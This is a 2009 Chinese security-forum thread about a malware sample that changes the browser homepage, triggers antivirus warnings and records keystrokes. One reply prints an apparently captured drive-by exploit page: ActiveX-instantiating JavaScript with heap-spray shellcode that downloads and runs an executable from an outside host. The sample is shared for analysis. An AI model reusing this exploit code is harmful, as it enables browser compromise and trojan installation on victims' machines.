改主页，卡巴弹窗口提示访问有毒网页，键盘记录行为

显示全部楼层 · 发表于 2009-3-23 18:20:42

附件太大无法上传，已上报，还请大虾们给点意见。

已经搞清除了，是冰刃相关的行为。
我用冰刃查了注册表，把注册表中有此名称的键值该掉之后，冰刃就出问题了。

[ 本帖最后由 any99 于 2009-4-23 15:48 编辑 ]

显示全部楼层 · 发表于 2009-3-24 15:25:20

附件图片一个也看不见，只能等上报结果了

显示全部楼层 · 发表于 2009-3-24 16:04:34

<html>

<script language="JavaScript">

Fuck="\0x90";

var Evilcuteid="clsid:6BE5";

var Evilcuteids="2E1D-E586-4";

var Evilcuteidss="74f-A6E2-1A";

var Evilcuteidsss="85A9B4D9FB";

ying_yings=document["createElement"]("object");

var Evilcuteidx=Evilcuteid+Evilcuteids+Evilcuteidss+Evilcuteidsss;

ying_yings["setAttribute"]("classid", Evilcuteidx);

var Cuteqq_code = window['unescape']("%u90" + "90%u90" + "90" +

"%uefe9%u0000%u5a00%ua164" +

"%u0030%u0000%u408b%u8b0c" +

"%u1c70%u8bad%u0840%ud88b" +

"%u738b%u8b3c"+"%u1e74%u0378" +

"%u8bf3%u207e%ufb03%u4e8b" +

"%u3314%u56ed%u5157%u3f8b" +

"%ufb03%uf28b%u0e6a%uf359" +

"%u74a6%u5908%u835f%u04c7" +

"%ue245%u59e9%u5e5f%ucd8b" +

"%u468b%u0324%ud1c3%u03e1" +

"%u33c1%u66c9%u088b%u468b" +

"%u031c%uc1c3%u02e1%uc103" +

"%u008b%uc303%ufa8b%uf78b" +

"%uc683%u8b0e%u6ad0%u5904" +

"%u6ae8%u0000%u8300%u0dc6" +

"%u5652%u57ff%u5afc%ud88b" +

"%u016a%ue859%u0057%u0000" +

"%uc683%u5613%u8046%u803e" +

"%ufa75%u3680%u5e80%uec83" +

"%u8b40%uc7dc%u6303%u646d" +

"%u4320%u4343%u6643%u03c7" +

"%u632f%u4343%u03c6%u4320" +

"%u206a%uff53%uec57%u04c7" +

"%u5c03%u2e61%uc765%u0344" +

"%u7804%u0065%u3300%u50c0" +

"%u5350%u5056%u57ff%u8bfc" +

"%u6adc%u5300%u57ff%u68f0" +

"%u2451%u0040%uff58%u33d0" +

"%uacc0"+"%uc085%uf975%u5251" +

"%u5356%ud2ff%u595a%ue2ab" +

"%u33ee%uc3c0%u0ce8%uffff" +

"%u47ff%u7465%u7250%u636f" +

"%u6441"+"%u7264%u7365%u0073" +

"%u6547%u5374%u7379%u6574" +

"%u446d%u7269%u6365%u6f74" +

"%u7972%u0041%u6957%u456e" +

"%u6578%u0063%u7845%u7469" +

"%u6854%u6572%u6461%u4c00" +

"%u616f%u4c64%u6269%u6172" +

"%u7972%u0041%u7275%u6d6c" +

"%u6e6f%u5500%u4c52%u6f44" +

"%u6e77%u6f6c%u6461%u6f54" +

"%u6946%u656c%u0041%u7468%u7074%u2f3a%u672f%u772e%u6375%u2e38%u6f63%u2f6d%u6161%u652e%u6578%u0000");

var bigblock = window["unescape"]("%u90"+"90"+"%u90"+"90");

var cuteqqoday;

cuteqqoday = 20;

var cuteqqoday2;

var chilam_syz;

cuteqqoday2 = cuteqqoday+Cuteqq_code["length"];

while (bigblock["length"…

下载者木马hXXp://g.wuc8.com/aa.exe

[ 本帖最后由 nanhezzb 于 2009-3-24 16:08 编辑 ]

显示全部楼层 · 发表于 2009-3-24 17:00:15

KV2009 Heur:Worm/Autorun

显示全部楼层 · 发表于 2009-3-24 17:04:42

to VB

显示全部楼层 · 发表于 2009-3-24 18:07:31

修改链接失败。。。

显示全部楼层 · 发表于 2009-3-24 18:19:45

没有关于我的帖子的答复么？

显示全部楼层 · 发表于 2009-3-24 18:42:46

RISING MISS

显示全部楼层 · 发表于 2009-3-24 19:34:07

怎么没有样本啊？

显示全部楼层 · 发表于 2009-3-24 20:35:24

IOSN-防护
已发现恶意程序
WIN/修改系统项
您的系统正在被装入键盘输入记录
允许
阻止
360保险箱
您的报告结果发现有键盘记录

[病毒样本] 改主页，卡巴弹窗口提示访问有毒网页，键盘记录行为

本帖子中包含更多资源

回复 3楼 nanhezzb 的帖子

本帖子中包含更多资源

To 3 楼

本帖子中包含更多资源

怎么看不明白？

浏览过的版块